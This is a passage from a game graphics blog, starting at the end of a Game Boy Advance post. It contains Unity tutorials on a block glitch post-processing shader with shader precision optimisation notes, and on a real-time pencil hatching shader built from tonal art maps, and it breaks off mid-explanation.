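A counter of 240 lands at (0, 10), the start of the second row of cells, and 3830 lands at (230, 150), the very last cell. A counter of 3840 would map to row 160, one row past the bottom of the screen, which is why the counter has to wrap back to 0 before then.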

Wrap Up

Usually I’d talk about performance, but I haven’t figured out how to get a timer running on the GBA yet, so I really can’t, other than to say the snake game runs smoothly. I have no idea when I’ll post more about game boy stuff, since I have other projects that I want to get done, but hopefully this was helpful enough to get you started, and pointed at some much more detailed resources!

If you’re interested in the Snake game that I made for GBA, all the source is available on github here.

As always, if you have any questions, comments, or cat gifs, send them my way on Twitter!

Fixeds, Floats and a Block Damage Effect

2017-03-13T00:00:00+00:00

As you may have guessed from everything that I post, I love cheesy rendering effects, and no surprise, that means that I’m a big fan of cyberpunk games, especially ones that really go over the top with effects. As such, I thought I’d spend some time this weekend building a classic glitch effect:

It’s a very simple effect, but it’s also a perfect excuse to talk about using the correct precision for variables when writing shaders. In the last article I wrote, I touched a bit on using texture formats that have enough precision for the data you’re storing in them; today I’m going to go over how to decide whether to use a fixed, half or float on a line to line basis when writing a shader.

That will come later though, first, let’s go over how the glitch effect we’re building works:

How It works

The first thing we’ll need to do is find some way to divide our screen up into rectangular regions, identified by a scalar value. You can do this with UV math right in the shader, but it’s much easier to play with if this is texture driven, so we’ll need to create a texture like the following:

Since this texture identifies each block with a value between 0 and 1 (the intensity of the colour), we’ll pass a second value to our shader also between 0 and 1. As the shader executes, any fragment which is in a block that has a value less than our control value will sample the screen buffer using UVs which have had a constant value added or subtracted to them. This will keep all texture samples within a block cohesive with each other, producing the effect we want:

If we use the grayscale image above however, our UV offset will always be diagonal and in the same direction, which isn’t exactly what we want. So I’m going to use the R channel as our identifier channel, and put different random values into the GB channels of the noise texture, which we’ll use to drive our UV offsets:

(I wrote a quick tool to generate these types of maps, I’m not going to walk through building it, but you can grab it in the github repo here)

Then we’ll modify the effect to randomly choose which blocks to glitch, so that we don’t end up with a predictable pattern of glitchiness (which…kinda looks the opposite of glitchy), and I’ll talk a bit about some things you can do to make the whole effect look a bit more convincing (imo), and different ways you can extend it. I’ll also sprinkle in some notes about optimization.

So let’s get started!

Getting Something On Screen

I always try to get something on screen as fast as possible when I work, both so that I can verify that my code is doing what I think it should be, and to make sure that what I’m building actually looks good. So let’s start this effect the same way, by just getting the glitch effect working and distorting the whole screen.

Like usual, we’re going to be making a post effect, so we need to start with a bit of scaffolding in C#. Unlike past articles, this effect is simple enough that we don’t need to set up any extra cameras, we just need to make sure that we blit to the screen using our effect material:

[RequireComponent(typeof(Camera))]
public class GlitchFX: MonoBehaviour
{
public float glitchAmount = 0.0f;
public Texture2D blockTexture;

private Shader _glitchShader;
private Material _glitchMat;

void Start ()
{
    _glitchShader = Shader.Find("Hidden/GlitchFX/GlitchFX_Shift");
    _glitchMat = new Material(_glitchShader);
    _glitchMat.SetTexture("_GlitchMap", blockTexture);
}

private void OnRenderImage(RenderTexture source, RenderTexture destination)
{
    Graphics.Blit(source, destination, _glitchMat);
}

void Update ()
{
    glitchAmount = Mathf.Clamp(glitchAmount, 0.0f, 1.0f);
    _glitchMat.SetFloat("_GlitchAmount", glitchAmount);
}
}

We’ll revisit this script later on when we want to tweak the effect, but for now, this is all we’ll need to get going. Next up, we need to get our shader set up. I’m going to assume that you can set up most of the material file yourself, and skip right to the fragment shader. If you’re lost, the shader is also in the github repo here

fixed4 frag (v2f i) : SV_Target
{
    fixed2 glitch = (tex2D(_GlitchMap, i.uv)).rg;			
    fixed4 col = tex2D(_MainTex, i.uv + glitch.rg);
    return col;
}

Alright, now we’re cooking! If you run this now you should get a full screen of glitchy goodness! If you’re seeing weirdness around the edges of the blocks like this:

Make sure that you’ve set your noise map texture to “point” filtering.

Optimization Notes Part 1

While what we’re doing is very straightforward, it’s worth taking a minute to talk about a quick optimization point. Notice that I’m only grabbing 2 channels from the texture. This is going to be very slightly faster than grabbing the whole texture, or grabbing just 1 channel and creating a fixed2 from that.

You can test this yourself the same way I did, and run the above post process effect 101 times per frame, like so:

private void OnRenderImage(RenderTexture source, RenderTexture destination)
{
    RenderTexture t = RenderTexture.GetTemporary(source.width, source.height);
    for (int i = 0; i < 50; ++i)
    {
        Graphics.Blit(source, t, _glitchMat);
        Graphics.Blit(t, source, _glitchMat);
    }
    Graphics.Blit(source, destination, _glitchMat);
    RenderTexture.ReleaseTemporary(t);
}

On my iPhone 6, the performance impact was too small to see without doing something like the above, and even in the above stress test, we’re talking about a difference of about 2 ms. It’s not like your project will fail if you don’t know this technique, but small optimizations add up, especially when you’re trying to hit 60 fps on mobile.

So that covers the texture sample line, but I also mentioned that we’d pay special attention to the precision of variables in this post, so let’s talk about why the texture sample was stored in a fixed2, and not a float2, for instance. As we’ll see when we have more instructions to look at, it’s a matter of minimizing the number of times we need to cast our data to a different precision. Some functions take floats as args, so passing in a fixed will require it to be cast up into a higher precision type or vice versa.

It’s also worth looking at the glsl that will be generated by Unity’s shader compiler for the above shader:

uniform sampler2D _MainTex;
uniform sampler2D _GlitchMap;
varying highp vec2 xlv_TEXCOORD0;
void main ()
{
  lowp vec4 tmpvar_1;
  tmpvar_1 = texture2D (_GlitchMap, xlv_TEXCOORD0);
  highp vec2 P_2;
  P_2 = (xlv_TEXCOORD0 + tmpvar_1.xy);
  lowp vec4 tmpvar_3;
  tmpvar_3 = texture2D (_MainTex, P_2);
  gl_FragData[0] = tmpvar_3;
}

Notice that by default, sampler2Ds in CG code are turned into low precision samplers in GLSL by Unity. GLSL lowp, mediump and highp float precision qualifiers map to CG’s fixed, half and float datatypes. This means that if we used a float2 instead of a fixed2 to store the texture lookup, we’d need to cast the value returned by the tex2D call up into float precision. You can see this happen if you change glitch to a float2 and examine the glsl again:

uniform sampler2D _MainTex;
uniform sampler2D _GlitchMap;
varying highp vec2 xlv_TEXCOORD0;
void main ()
{
  highp vec2 glitch_1;
  lowp vec2 tmpvar_2;
  tmpvar_2 = texture2D (_GlitchMap, xlv_TEXCOORD0).xy;
  glitch_1 = tmpvar_2;
  highp vec2 P_3;
  P_3 = (xlv_TEXCOORD0 + glitch_1);
  lowp vec4 tmpvar_4;
  tmpvar_4 = texture2D (_MainTex, P_3);
  gl_FragData[0] = tmpvar_4;
}

This may look like a trivial change (in fact, the PowerVR Shader Editor doesn’t even recognize it as an extra instruction), but the performance impact of minimizing precision casts is very real. Again, I highly recommend you write some tests to try it out for yourself, using the same method as before (running it 100 times per frame). If you do, you’ll notice that the cost of an individual cast isn’t that high, but across a whole project, these costs can add up.

Also, since we’re not sampling from a half precision or floating point texture, there really isn’t anything to be gained from using anything but a fixed here. If you need to sample from one of those textures, you can add a suffix to your sampler2D uniform to get a half or full precision sampler:

sampler2D_float _GlitchMap;
sampler2D_half _GlitchMap;

Ok, that’s a lot of analysis for now, let’s do something a bit more flashy.

Finishing the Glitch Effect

So far our post process shader is assuming that we want to distort the entire screen RIGHT NOW, but that isn’t how the glitch effect we want works, we want to distort different parts of the screen at different times.

I’m going to start by using the value of the red channel in our map as the noise value for the blocks. This will give us an effect that follows a predictable pattern, but it will be way more convincing than what we have now. Once this is working, we can worry about adding randomness.

So what we need to do is pass a float value to the shader, and compare the value of each block against this value. Blocks which have a value less than our passed in control value will use the offset UVs (appearing glitched), and blocks with a value greater than or equal to it will appear normal. This means that if we pass a value of 1.0 as our control value, every block with a value below 1.0 will glitch.

If all GPUs were good at branching, this could be written like this:

fixed4 frag(v2f i) : SV_Target
{
    fixed2 glitch = (tex2D(_GlitchMap, i.uv)).rg;

    float2 uvShift = glitch.rg;
    if (glitch.r >= _GlitchAmount)
    {
        uvShift *= 0.0;
    }

    fixed4 col = tex2D(_MainTex, frac(i.uv + uvShift));
    return col;
}

But since we can’t be sure what device this effect will need to run on, I’m going to replace the conditional with a bit of math that accomplishes the same thing:

fixed4 frag(v2f i) : SV_Target
{
    fixed2 glitch = (tex2D(_GlitchMap, i.uv)).rg;

    float2 uvShift = glitch.rg * ceil(_GlitchAmount - glitch.r);

    fixed4 col = tex2D(_MainTex, i.uv + uvShift);
    return col;
}

All we’re doing here is comparing our two values with a subtract and rounding up to the nearest whole number. This only works because we know that both numbers have the same range (0 to 1). However, this has an edge case: if a block’s value in the glitch map is exactly 1.0 and _GlitchAmount is 0, the subtraction gives exactly -1, and ceil leaves that at -1 instead of 0. That would distort part of the image even when we want no glitching, which is obviously incorrect. I’m going to add a max to the calculation here to resolve this:

float2 uvShift = glitch.rg * ceil(max(-0.99,_GlitchAmount - glitch.r));

In a real project though, you’ll want to pre-process your glitch map to make sure it doesn’t have any 1.0 blocks so that you can get rid of this extra instruction and save some performance.

You may have noticed if you run this right now, you get some weird colours in your glitched image, for me, this looked like way more brown than there should have been:

This is because when we add our UV offset to our UV coordinates, we’re ending up sampling from outside of the area of the screen buffer. The buffer is set to clamp at the border, meaning what we’re seeing is a lot of fragments picking up pixels from the edge of our image. Since we don’t care about the integer value of our UV coordinates (and in fact want to get rid of them), we can add a frac() function to our shader and get home-grown UV wrapping.

fixed4 col = tex2D(_MainTex, frac(i.uv + uvShift));

Put all this together and you get an effect that looks like this as the _GlitchAmount value pans from 0 to 1:

Optimization Notes Part 2

We have another line of shader code now, so let’s talk about it:

    float2 uvShift = glitch.rg * ceil(max(-0.99,_GlitchAmount - glitch.r));

First of all, it’s almost always a bad idea to use anything but floats to hold UV coordinates. The other datatypes don’t have enough precision to accurately sample a texture, which is what you want them to do 99% of the time. We don’t really care about whether or not our shifted coordinates are super accurate though, so the question of what data type to use comes down to raw performance.

Boringly enough this doesn’t actually change anything, because _GlitchAmount is a float, and the tex2D() function expects the uv coordinates that get passed to it to be floats, so no matter what we start with, we very quickly need to cast our variable up to a float anyway, so we may as well keep to the standard rule of “uv math gets done in full precision” here too.

It’s worth noting that although we’re working with fixeds a lot in this post, on newer hardware, most GPUs have full support for halfs and will go so far as to ignore the fixed qualifier and do everything in halfs and floats. Check the specifics for your target devices, but it’s usually safe to say that if your iOS device supports metal, it’s safe to use halfs instead of fixeds. I’m under the impression that this is even more common on Desktops.

Alright, back to making things look cool!

Randomizing the Glitch

Our effect is looking better, but it still isn’t really “glitchy” is it? If we leave our glitch value alone, the effect stays static, distorting fixed blocks on the screen. As well, even with the _GlitchAmount value changing, our effect follows a predictable pattern, always glitching blocks in the same order. It’s time to make this a bit more random.

To do this, we’re going to need to be able to get a random value for each block to use instead of the red channel intensity to decide when to glitch a block. Further, we’re going to want this random value to not only be uniform across an entire block, we also want to be able to control when the random values change so that we can control how fast our effect updates.

Luckily, the commonly copy/pasted one liner for generating random numbers in a shader takes two parameters as input:

float rand(float2 co)
{
    return frac(sin(dot(co.xy, float2(12.9898, 78.233))) * 43758.5453);
}

So we’re going to use that, and pass the red channel value as the first component of co, and pass a uniform float that we send from c# to the shader as the second component. It’s beyond the scope of this post to talk about how this one liner works, but if you have a spare second it’s definitely worth googling.

This time we’re using floats because we want more potential variety in our random number. Using a half or a fixed reduces the number of values that can be represented between 0 and 1. It might not make a huge difference if you use halfs here instead of floats, but it will make some, and as you’ll see in a second, we would need to cast it up to a float back in our fragment function anyway.

Our shader now looks like this:

sampler2D _MainTex;
sampler2D _GlitchMap;

float _GlitchAmount;
float _GlitchRandom;

float rand(float2 co)
{
    return frac(sin(dot(co.xy, float2(12.9898, 78.233))) * 43758.5453);
}

fixed4 frag(v2f i) : SV_Target
{
    fixed2 glitch = (tex2D(_GlitchMap, i.uv)).rg;

    float r = (rand(float2(glitch.r, _GlitchRandom)));
    float gFlag = max(0.0, ceil(_GlitchAmount - r));

    float2 uvShift = glitch.rg * gFlag;

    fixed4 col = tex2D(_MainTex, frac(i.uv + uvShift));
    return col;
}

And in c#, we have to add a line to our update() function:

void Update ()
{
    glitchAmount = Mathf.Clamp(glitchAmount, 0.0f, 1.0f);
    _glitchMat.SetFloat("_GlitchRandom", Random.Range(-1.0f, 1.0f));

    _glitchMat.SetFloat("_GlitchAmount", glitchAmount);
}

If you set your _GlitchAmount to 0.2 and run this now it looks something like this:

Which is much better, but a little bit too spastic for my liking. I ended up putting my _GlitchRandom setter inside another function that I called using Invoke, so that I could control how often I wanted my effect to update:

void Start ()
{
    _glitchShader = Shader.Find("Hidden/GlitchFX/GlitchFX_Shift");
    _glitchMat = new Material(_glitchShader);
    _glitchMat.SetTexture("_GlitchMap", blockTexture);

    Invoke("UpdateRandom", 0.25f);
}

void UpdateRandom()
{
    _glitchMat.SetFloat("_GlitchRandom", Random.Range(-1.0f, 1.0f));
    Invoke("UpdateRandom", Random.Range(0.01f, 0.15f));
}

It’s a little change, but it makes a big difference!

Adding New Sample Directions

We have two final problems to solve:

when the effect is set to 1.0, the screen still ends up with a static looking glitch effect
all our texture lookups are going in the same direction, since we’re using a gray value as our offset

Thankfully both are pretty easy to solve. To fix the first one, all I’m going to do is multiply the UV offset by the random value for the block. This way, even when the entire screen is glitching, when _GlitchRandom updates, every block will use different UV coordinates, making it much less uniform.

float2 uvShift = glitch.rg * gFlag * r;

And secondly, we’re finally going to use that coloured noise map I showed you at the very beginning! Until now, we’ve been using the rg components of the noise texture as a cheap way to get a uv offset. Now we’re going to change to using the coloured map, and use the green and blue components for this vector:

fixed4 frag(v2f i) : SV_Target
{
    fixed3 glitch = (tex2D(_GlitchMap, i.uv)).rgb;

    float r = (rand(float2(glitch.r, _GlitchRandom)));
    float gFlag = max(0.0, ceil(_GlitchAmount-r));

    float2 uvShift = glitch.gb * gFlag * r;

    fixed4 col = tex2D(_MainTex, frac(i.uv + uvShift));
    return col;
}

This is better, but since the .gb channels will always have positive values, our texture lookups still only go in one direction: positive along both axes. To fix this, we need to stretch the range of these channels so that 0.5 becomes our new 0, and values lower than 0.5 become negative. This just takes a quick multiply and subtract:

float2 uvShift = (glitch.gb * 2.0 - 1.0) * gFlag;
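If you want to convince yourself the remap does what we want, here's a small CPU-side sketch in Python (not shader code, and the function names are made up for illustration) that mirrors the gFlag and uvShift lines above. It assumes every input is in the 0-1 range, like it would be in the shader.

```python
import math


def glitch_flag(glitch_amount, r):
    """Mirror of max(0.0, ceil(_GlitchAmount - r)).

    Returns 1.0 if the block should glitch and 0.0 if it should not,
    assuming glitch_amount and r are both in the 0-1 range.
    """
    return max(0.0, float(math.ceil(glitch_amount - r)))


def uv_shift(g, b, flag):
    """Mirror of (glitch.gb * 2.0 - 1.0) * gFlag: remaps 0..1 to -1..1."""
    return ((g * 2.0 - 1.0) * flag, (b * 2.0 - 1.0) * flag)


# A block whose random value is below the glitch amount gets shifted,
# and values under 0.5 now push the lookup in the negative direction.
print(uv_shift(0.25, 0.75, glitch_flag(0.5, 0.2)))  # (-0.5, 0.5)

# A block whose random value is above the glitch amount is left alone.
print(uv_shift(0.25, 0.75, glitch_flag(0.5, 0.9)))
```

A channel value of exactly 0.5 ends up as no shift at all, which is the "0.5 becomes our new 0" part.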

If you run this now, you’re going to get exactly the effect that was shown at the start of the article!

Wrap Up

As usual, all of the code I talked about here is available on github, feel free to grab that and use it however you want!

Let’s end by talking about performance, and some ways you could extend this effect.

From a performance standpoint, this is a remarkably light effect. Even though we’re introducing a dependent texture read on a full resolution screen buffer, my iPhone 6 barely noticed this thing running, taking around 0.2 ms to render it. One thing to keep in mind with this effect is that the cost is the same whether you’re glitching the whole screen, or not glitching anything, so if you have this in a project, it might be worth adding some logic on the C# side to disable the effect when _GlitchAmount is set to 0.

Finally, there are LOTS of ways you can extend this effect! You could hue shift the glitched blocks, tint them colours, you could add chromatic aberration to the glitched blocks, or use a noise texture to add weird artifacts over them. The sky is really the limit here. If you want some inspiration, take a look at the page for the DigiEffects Damage AfterEffects Package. Glitch effects are really fun because there’s so much you can do with them since you’re not trying to make things look “correct,” which is probably why so many people like making glitch art.

That’s it for now! As usual, if you have questions, or want to say hi, or see something I got wrong, please send me a message on Twitter! Have a good one!

A Pencil Sketch Effect

2017-02-21T00:00:00+00:00

There are a handful of effects that have kicked around in my brain for a while in a nebulous “one day, I want to build that” sort of way. Some of these include using genetic algorithms to turn images into triangles (like here), Portals, Procedural Clouds, and the one I decided to build this weekend: Real Time Hatching (or something like it)!

Real Time Hatching is the fancy (and much more concise) way of describing the class of rendering effects that make scenes look like they were drawn (or at least shaded) by hand. The effect is actually reasonably simple, but it’s pretty fun and provides a few good excuses to talk about fixed/half/float precision.

I’m going to present the basic effect as it would look if you wanted to write a shader to attach to a single object, how to turn that into a post effect that will work on the whole screen, and take a few detours in the process. All the code here is going to be for Unity 5.5, so your mileage may vary if you’re using a different version.

Tonal Art Maps

Before we do anything though, we need to talk about the basic theory behind real time hatching. The whole effect is based on the concept of Tonal Art Maps (or TAMs). These are a series of textures which correspond to how you want your art to look at different lighting intensities. The tricky part about them is that in order for things to look right, each texture needs to contain all the information stored in all the maps which correspond to brighter tones within them. So your second brightest map needs to contain all the texture data of your brightest, plus the additional data that makes this map darker.

This is sorta complicated when stated in words, but it’s a lot more intuitive when you see the textures. The following was taken from a widely cited research paper (located here) which presented the technique we’re going to use today.

As you can see, each map represents pencil strokes that an artist would make to shade in a part of a piece of paper. The darker maps contain all the pencil strokes from the brighter regions, and then add more. If you don’t follow this rule when creating your maps, the strokes won’t nicely flow into each other, and you’ll end up with very weird looking line shading.
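The "darker maps contain everything in the brighter maps" rule is easy to check mechanically. Here's a rough Python sketch of that check. It assumes each map is just a flat list of grayscale values where 0.0 is a pencil stroke and 1.0 is blank paper; that representation and the is_nested_tam name are mine, not something from the paper.

```python
def is_nested_tam(levels):
    """Check the TAM nesting rule.

    levels: list of images ordered brightest to darkest. Each image is a
    flat list of grayscale values (0.0 = stroke, 1.0 = paper).
    Returns True if every darker level is at least as dark as the level
    before it at every pixel, i.e. no stroke disappears as things get darker.
    """
    for brighter, darker in zip(levels, levels[1:]):
        if any(d > b for b, d in zip(brighter, darker)):
            return False
    return True


light = [1.0, 1.0, 0.0, 1.0]   # one stroke
medium = [1.0, 0.0, 0.0, 1.0]  # keeps that stroke and adds another
broken = [0.0, 1.0, 1.0, 1.0]  # drops the original stroke

print(is_nested_tam([light, medium]))  # True
print(is_nested_tam([light, broken]))  # False
```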

In order for us to have a “proper” TAM, we need to go a step further than simply authoring our hatching textures according to the above rules, we also need to provide custom mips. If you don’t, then as your objects get farther away, you’re going to see less and less stroke detail on them. The paper goes into detail as to how they generated the custom mips, and provides an example of what they made:

from http://hhoppe.com/hatching.pdf

I’m actually going to skip all of this custom mip texture generation stuff, because I don’t feel like creating my own TAM generator, given that my interest in this effect was really just in figuring out how it worked, not using it for a commercial product. Suffice to say, I’m sure it would look better if you spend the time to create the custom mips. If you want to get a look at a working TAM generator, I found one written in Processing here.

Ok, that was a lot of writing for not a lot of output, but now that we have our TAM images, we can proceed with actually creating the effect.

A Single Object Shader

So now that we have our TAM, we need to create a shader that uses it. The paper that I cited earlier presents a method for applying a set of 6 TAM textures to an object, and (importantly) those 6 lookups can be packed into two texture accesses. This is an important thing to dwell on for a second, because it gets missed a lot of the time when people post real time hatching shaders: DO NOT add 6 texture lookups to your shader for hatching. Pack the textures into the channels of 2 RGB textures instead.

To pack the TAM textures together, I wrote a quick and dirty Unity tool. The code is a bit long to paste here, but it’s available on the github repo linked at the end of the post, or in the gist here.
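The real tool is a Unity editor script, but the packing idea itself is tiny. As a hedged illustration only (this is not the code from the repo, and pack_tams is a made-up name), here's the same idea in Python, with each grayscale map represented as a flat list of values:

```python
def pack_tams(tams):
    """Pack six grayscale images into two RGB images.

    tams: list of six equally sized images, each a flat list of floats,
    given in the order the shader expects to read them.
    Returns (tex0, tex1), where every texel is an (r, g, b) tuple.
    """
    if len(tams) != 6:
        raise ValueError("expected exactly 6 tonal art maps")
    size = len(tams[0])
    if any(len(t) != size for t in tams):
        raise ValueError("all maps must have the same number of pixels")

    # Maps 0-2 become the R, G and B channels of the first texture,
    # maps 3-5 become the channels of the second.
    tex0 = list(zip(tams[0], tams[1], tams[2]))
    tex1 = list(zip(tams[3], tams[4], tams[5]))
    return tex0, tex1


maps = [[i / 10.0] * 4 for i in range(6)]  # six tiny 2x2 "images"
tex0, tex1 = pack_tams(maps)
print(tex0[0], tex1[0])
```

One sample of each packed texture now gives the shader three hatch levels at once, which is where the "6 lookups in 2 texture accesses" saving comes from.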

I used that tool to combine the above 6 TAM images into the following:

Which is much more space efficient! Now we need to look at how the shader is going to work.

Obviously we’re going to be blending between the 6 channels in our two textures, but how we do it is pretty nifty. Before we get started though, let’s get the basic skeleton of our shader out of the way. Remember that for now, we’re going to be writing a shader that we can apply to a single object. Here’s the setup:

sampler2D _MainTex;
float4 _MainTex_ST;

sampler2D _Hatch0;
sampler2D _Hatch1;
float4 _LightColor0;

v2f vert (appdata v)
{
    v2f o;
    o.vertex = mul(UNITY_MATRIX_MVP, v.vertex);
    o.uv = v.uv * _MainTex_ST.xy + _MainTex_ST.zw;
    o.nrm = mul(float4(v.norm, 0.0), unity_WorldToObject).xyz;
    return o;
}

fixed4 frag (v2f i) : SV_Target
{
    fixed4 color = tex2D(_MainTex, i.uv);
    half3 diffuse = color.rgb * _LightColor0.rgb * dot(_WorldSpaceLightPos0, normalize(i.nrm));

    //hatching logic goes here

    return color;
}

The complete source for the effect is available on github here, but hopefully the above is enough to get us all on the same page. All we have here is a standard diffuse shader. While you will likely need more than a single directional light in a real project, the hatching logic works well with any light input, so I’m going with a simple case here.

The first thing we need to do is to get a scalar representation of how bright our fragment is with all the lighting applied. This just requires a dot product against a vector constant (0.2126, 0.7152, 0.0722).

half intensity = dot(diffuse, half3(0.2126, 0.7152, 0.0722));

This constant comes from the luminosity function, and in theory requires that the colour we’re multiplying it against has been converted to linear space. Depending on what platform you’re on, you may or may not care about this. For simplicity I’m going to omit it, just be aware that like most lighting calculations, if you aren’t working with linear colour, you’re sacrificing correctness in favor of performance.
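To get a feel for how much the linear conversion matters, here's a small Python sketch (CPU-side, not shader code) that computes luminance both ways. It assumes the colours are sRGB encoded and uses the standard sRGB decoding curve with the Rec. 709 luminance weights; the function names are just for illustration.

```python
def srgb_to_linear(c):
    """Standard sRGB decoding for a single channel in the 0-1 range."""
    if c <= 0.04045:
        return c / 12.92
    return ((c + 0.055) / 1.055) ** 2.4


LUMA = (0.2126, 0.7152, 0.0722)  # Rec. 709 luminance weights


def luminance(rgb, convert_to_linear=False):
    """Dot product of a colour with the luminance weights."""
    if convert_to_linear:
        rgb = tuple(srgb_to_linear(c) for c in rgb)
    return sum(w * c for w, c in zip(LUMA, rgb))


grey = (0.5, 0.5, 0.5)
print(luminance(grey))                          # treats the values as already linear
print(luminance(grey, convert_to_linear=True))  # noticeably darker
```

For a mid grey the two answers differ by more than a factor of two, which in this effect would be the difference between picking one hatch level or another a couple of steps away.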

Also note that we’re calculating this value in halfs. While you likely wouldn’t see too much of a difference with a fixed precision variable, an 11 bit fixed precision variable is only accurate to about 0.0039 (or 1/256), and the luminosity constant we’re using requires more precision to accurately represent. If you’re splitting hairs, you can’t store 0.7152 completely correctly in a half either, but it’s off by much, much less (if you’re interested, more info on half precision vars can be found here).
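If you'd like to see those errors for yourself, this Python sketch rounds each luminosity weight to the nearest 1/256 (the fixed precision quoted above) and to an IEEE 754 16-bit float, then prints how far off each one lands. It's only an approximation of what a GPU does, since real hardware is free to implement fixed and half with more precision than the minimum.

```python
import struct


def to_fixed(x, steps=256):
    """Round x to the nearest 1/256, the precision quoted above for fixed."""
    return round(x * steps) / steps


def to_half(x):
    """Round-trip x through an IEEE 754 16-bit float."""
    return struct.unpack('<e', struct.pack('<e', x))[0]


for c in (0.2126, 0.7152, 0.0722):
    fixed_error = abs(to_fixed(c) - c)
    half_error = abs(to_half(c) - c)
    print(c, fixed_error, half_error)
```

The gap is biggest for the small blue weight, because a half float gets more precise as values get closer to zero while the fixed step size stays the same.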

If we add that line to our shader, and output the result, we’ll end up with a nice grayscale effect:

Now all we need to do is to convert that scalar intensity value into a hatch texture sample. We have 6 hatch channels, which means that there are going to be 6 different intensity values that will map to a sample from only 1 hatch texture (1/6, 2/6, 3/6, 4/6, 5/6, 6/6). Any value that isn’t one of these exact values is going to require us to blend between the two textures that our value is between. This means that an intensity value of 1.5 / 6 (or 0.25) will require us to blend between the textures that correspond to 1/6 and 2/6. This is demonstrated in the diagram below.
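In plain CPU-side terms, the mapping described above looks something like the following Python sketch. The blend_pair name and the convention that level k corresponds to an intensity of k/6 (with level 0 meaning black) are my own shorthand, and it assumes intensity is in the 0-1 range.

```python
import math


def blend_pair(intensity, levels=6):
    """Return (lower, upper, t) for an intensity in the 0-1 range.

    lower and upper are the two hatch levels to blend between, where level k
    corresponds to an intensity of k / levels (level 0 is plain black), and
    t is how far we are from lower towards upper.
    """
    scaled = intensity * levels
    lower = int(math.floor(scaled))
    t = scaled - lower
    upper = min(lower + 1, levels)
    return lower, upper, t


print(blend_pair(0.25))  # (1, 2, 0.5)
print(blend_pair(0.5))   # (3, 4, 0.0)
```

An intensity of 0.5 sits exactly on level 3, so its blend factor is 0 and only one texture contributes.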

Unfortunately for us, GPUs (or at least, mobile GPUs) aren’t great at branching logic. So while it seems straightforward to write this with a few if statements like so:

fixed3 rgb = fixed3(0.0, 0.0, 0.0);
if (intensity > 1.0 && intensity < 2.0)
{
    fixed3 hatch = tex2D(hatch0, uv).rgb;
    rgb += hatch.r * (2.0 - intensity);
    rgb += hatch.g * (intensity - 1.0);
}
else if (intensity == 2.0)
{
    rgb = tex2D(hatch0, uv).g;
}
else if ...

We really, really, don’t want to do that in our shader, since it would mean a big unnecessary performance penalty. Instead, what we want is to write something that looks like this:

fixed3 rgb = fixed3(0.0, 0.0, 0.0);
fixed3 hatch = tex2D(hatch0, uv).rgb;
rgb += hatch.r * weight0;
rgb += hatch.g * weight1;
rgb += hatch.b * weight2;
...

Notice how in both cases we end up doing the same number of texture samples, but the second case contains no branching at all. What we need to do is calculate the weights we multiply by so that we only take data from the hatch textures we want to use. It would also be nice if those weights could be created such that the sum of the weights for the textures we want added up to 1, while the weights for the other hatch samples stayed at 0.

Let’s look at how to do this. Again, we have 6 textures that we need to calculate weights for, so it stands to reason that we’re going to need to compare our intensity value against 6 numbers to determine these weights. We are going to store the difference between our intensity and each of these comparing values in 2 half3s. It’s going to look like this:

half i = intensity * 6;
half3 intensity3 = half3(i,i,i);
half3 weights0 = intensity3 - half3(0,1,2);
half3 weights1 = intensity3 - half3(3,4,5);

There’s a few things to talk about in the above snippet. First of all, why am I using integer steps instead of decimal 1/6 steps? This is to avoid multiple divisions by 6 later on. We know that at most, we’re going to have 2 weights which are non zero, and those two weights need to add up to 1, so as long as the step between each weight is 1, we can simply lerp between them and get our final answer. Note that for this to work, we also need to multiply our intensity value by 6.

Let’s step through the above with a sample intensity value of 0.75:

half i = 0.75 * 6; // 4.5
half3 intensity3 = half3(i,i,i); //(4.5,4.5,4.5)
half3 weights0 = intensity3 - half3(0,1,2); //(4.5,3.5,2.5)
half3 weights1 = intensity3 - half3(3,4,5); //(1.5,0.5,-0.5)

Gross, we have some weight values that are outside of our 0-1 range, that’s not going to do us any favours later on, so let’s wrap our math in saturate calls and try that again.

half i = 0.75 * 6; // 4.5
half3 intensity3 = half3(i,i,i); //(4.5,4.5,4.5)

half3 weights0 = saturate(intensity3 - half3(0,1,2));
// weights0 = (1,1,1)

half3 weights1 = saturate(intensity3 - half3(3,4,5));
//weights1 = (1,0.5,0)

Ok, that’s more useful! Kinda, there’s still a few things to take care of here. For one, we said we needed a maximum of 2 non zero weights, and we have 5 right now. What we need to do is get rid of the weights for our lower values, so that the only ones remaining are for the two textures we actually want. We also want those two remaining weights to add up to 1.

Luckily all it takes is a bit of subtraction to fix everything up:

weights0.xy -= weights0.yz;
weights0.z -= weights1.x;
weights1.xy -= weights1.yz;

Nifty right? Using our example value of 0.75, this would give us two weight vectors: (0,0,0) and (0.5, 0.5, 0.0), which means that an input of 4.5 is a 50% blend of our 4th and 5th texture samples, which is exactly what we want to do!
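If you want to play with other intensity values without firing up Unity, here's the same saturate-and-subtract trick as a Python sketch. It works on a flat list of six weights instead of two half3s, but the arithmetic is meant to match the shader lines above step for step; the hatch_weights name is just for illustration.

```python
def saturate(x):
    """Clamp x to the 0-1 range, like the shader intrinsic."""
    return max(0.0, min(1.0, x))


def hatch_weights(intensity):
    """Return (weights0, weights1) as two lists of three floats."""
    i = intensity * 6.0
    # Same as saturate(intensity3 - half3(0,1,2)) and half3(3,4,5)
    w = [saturate(i - k) for k in range(6)]
    # Subtract each weight's upper neighbour; the last weight has none
    out = [w[k] - w[k + 1] for k in range(5)] + [w[5]]
    return out[:3], out[3:]


print(hatch_weights(0.75))  # ([0.0, 0.0, 0.0], [0.5, 0.5, 0.0])
```

One thing that falls out of this: the six weights always sum to saturate(intensity * 6), so they add up to 1 for any intensity of 1/6 or more, and fade towards 0 below that.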

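So now that we have our weights (called weightsA and weightsB from here on, to match the final shader), the rest is just some Multiply/Add operations on our two hatch texture samples, hatch0 and hatch1: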

half3 hatching = half3(0.0, 0.0, 0.0);
hatching += hatch0.r * weightsA.x;
hatching += hatch0.g * weightsA.y;
hatching += hatch0.b * weightsA.z;
hatching += hatch1.r * weightsB.x;
hatching += hatch1.g * weightsB.y;
hatching += hatch1.b * weightsB.z;

Which we can further optimize by vectorizing the multiplications before we add things together:

hatch0 = hatch0 * weightsA;
hatch1 = hatch1 * weightsB;

half3 hatching = hatch0.r +
    hatch0.g + hatch0.b +
    hatch1.r + hatch1.g +
    hatch1.b;

There are two things to note in the above. The first is how we’re handling black. Because our effect relies on keeping the relationship of less light == denser pencil strokes, we can’t treat black as a separate texture sample, because when we move between our darkest texture and pure black we won’t be adding any more strokes. Instead, when we’re blending between our darkest two texture samples, what we’re really doing is (darkestTexture * (1.0 - i)) + (2ndDarkest * i). This is expressed above but it isn’t immediately obvious.

